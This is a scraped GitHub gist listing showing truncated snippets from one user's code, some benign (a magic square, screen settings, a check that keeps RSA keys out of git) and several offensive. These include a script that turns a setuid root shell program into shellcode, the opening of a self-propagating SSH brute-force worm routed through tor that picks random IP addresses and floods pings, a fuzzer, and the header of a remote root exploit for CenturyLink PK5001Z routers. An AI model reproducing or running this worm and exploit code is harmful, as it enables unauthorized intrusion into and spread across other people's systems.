Skip to content

Instantly share code, notes, and snippets.

View oxagast's full-sized avatar
🔨
Probably breaking your code.

Mark Stealer Whitehall oxagast

🔨
Probably breaking your code.
View GitHub Profile
@oxagast
oxagast / nosecandy.c
Created January 20, 2016 23:04
nose candy
#include "stdio.h"
#include "string.h"
void test_op(unsigned char was, unsigned char expected) {
printf("%c", was);
}
int main(int argc, char *argv[]) {
if ((argc > 1) && (argc < 3)) {
char ui[10];
for (int uia=0; uia<6; uia++) {
ui[uia] = argv[1][uia];
@oxagast
oxagast / magicsquare.cpp
Last active June 30, 2016 16:37
magic square
// __ _ _ __ ___ __ ____ ____
// / ( \/ )/ _\ / __)/ _\/ ___(_ _)
// ( O ) (/ ( (_ / \___ \ )(
// \__(_/\_\_/\_/\___\_/\_(____/(__)
// magic square
#include <algorithm>
#include <cstdlib>
#include <cstring>
#include <iostream>
rm page_part 2>/dev/null;
arp | sed -e 's/.*ether[[:space:]]*//' -e 's/ C.*//' | grep : | xargs -I {XXX} curl -s https://www.adminsub.net/mac-address-finder/{XXX} | grep Vendor -A 1 | grep google > page_part;
cat page_part | cut -d '=' -f 5 | cut -d '"' -f 1 > macs_resolved && arp -n | arp -n | cut -f 1 -d ' ' > ips_tomac;
tail -n $(echo `cat ips_tomac | wc -l`-1 | bc) ips_tomac > ips_tomac2;
cat ips_tomac2 -n | tee resolved && cat macs_resolved -n | tee -a resolved;
rm ips_tomac ips_tomac2 macs_resolved page_part
### godmode by oxagast ###
echo '#include <unistd.h>' > sc.c;
echo 'int main(void) {setuid(0);execlp("/bin/sh", "sh", NULL);}' >> sc.c;
gcc sc.c -o godmode;
SHELLCODE=$(objdump --show-raw-insn -d godmode | grep -v "file format" | cut -f 2 -d ':' | cut -c -21 | cut -c 2- | sed -e 's/ /\n/g' | grep -v "^$" | sed -e 's/^/\\x/' | tr -d "\n")
echo -n "char shellcode[] = "
echo $SHELLCODE | sed -e 's/\(.\{60\}\)/\1\n/' | head -n 1 > s.tmp; echo $SHELLCODE | sed -e 's/^\n//' | sed -e 's/\(.\{80\}\)/\1\n/g' | sed -e 's/.*\"/ \"/' >> s.tmp; cat s.tmp | sed -e 's/^\\/"\\/' -e 's/$/\"/' | head -c -1
echo ";";
rm sc.c godmode;
#!/bin/bash
# alias "git"='~/.git_check_rsa.sh'
if [ "$(find . -type f 2>/dev/null | xargs head -n 1 2>/dev/null | grep 'BEGIN RSA' | head -n 1 2>/dev/null)" == "-----BEGIN RSA PRIVATE KEY-----" ]; then
echo RSA KEY FOUND!;
echo Not adding to git.;
exit 1;
else
git $@
fi
@oxagast
oxagast / github_rd.sh
Last active March 24, 2017 13:53
Get the total number of GitHub release downloads over all time for a project
REPO=ansvif; GITUSER=oxagast; curl -s https://api.github.com/repos/$GITUSER/$REPO/releases | grep download_count | sed -e 's/.*: //' -e 's/,/ + /' | tr -d '\n' | sed -e 's/+ $/\n/' | bc | tr -d '\n' ; echo " All time clones of $REPO."
@oxagast
oxagast / .screenrc
Last active April 27, 2017 20:36
Screen Settings
startup_message off
#idle 1800 lockscreen
vbell off
msgwait 2
defscrollback 15000
defutf8 on
shell bash
shelltitle "$ |bash"
bind '/' eval "clear" "scrollback 0" "scrollback 15000"
bind = resize =
@oxagast
oxagast / worts.sh
Created November 15, 2017 07:03
Bruteforce random SSH servers and propogate.
#!/bin/bash
dnf install tor torsocks expect -y; apt-get install tor torsocks expect build-essential -y; systemctl start tor &
werm=$(cat $0 | base64 -w 0);
pound='8.8.8.8';
while [ 1 ];
do
ip_address=$(dd if=/dev/urandom bs=4 count=1 2>/dev/null | od -An -tu1 | sed -e 's/^ *//' -e 's/ */./g')
ping $pound -f -c 10000 &
wget $pound &
servers_addresses=( $ip_address )
# bermise_fuzz
# oxagast
mupr="64";
syslog_crashes=$(grep "traps:\|segfault" /var/log/syslog -c);
binname="$1";
binshort=$(echo $binname | awk -F "/" '{print $NF}')
echo fuzzing $binname;
randchars=1;
@oxagast
oxagast / pk5001z00pin.c
Last active May 6, 2018 16:15
Remote root Exploit for PK5001Z CenturyLink Routers.
/* PK5001Z CenturyLink Router/Modem remote root exploit */
/* oxagast / Marshall Whittaker */
/* marshall@likon:[~/Code/pk5001zpwn]: gcc pk5001z00pin.c -o pk5001z00pin */
/* marshall@likon:[~/Code/pk5001zpwn]: ./pk5001z00pin */
/* PK5001Z CenturyLink Router remote root 0day */
/* Enjoy! */
/* --oxagast */
/* marshall@likon:[~/Code/pk5001zpwn]: ./pk5001z00pin 192.168.0.1 */
/* */
/* # uname -a; id; */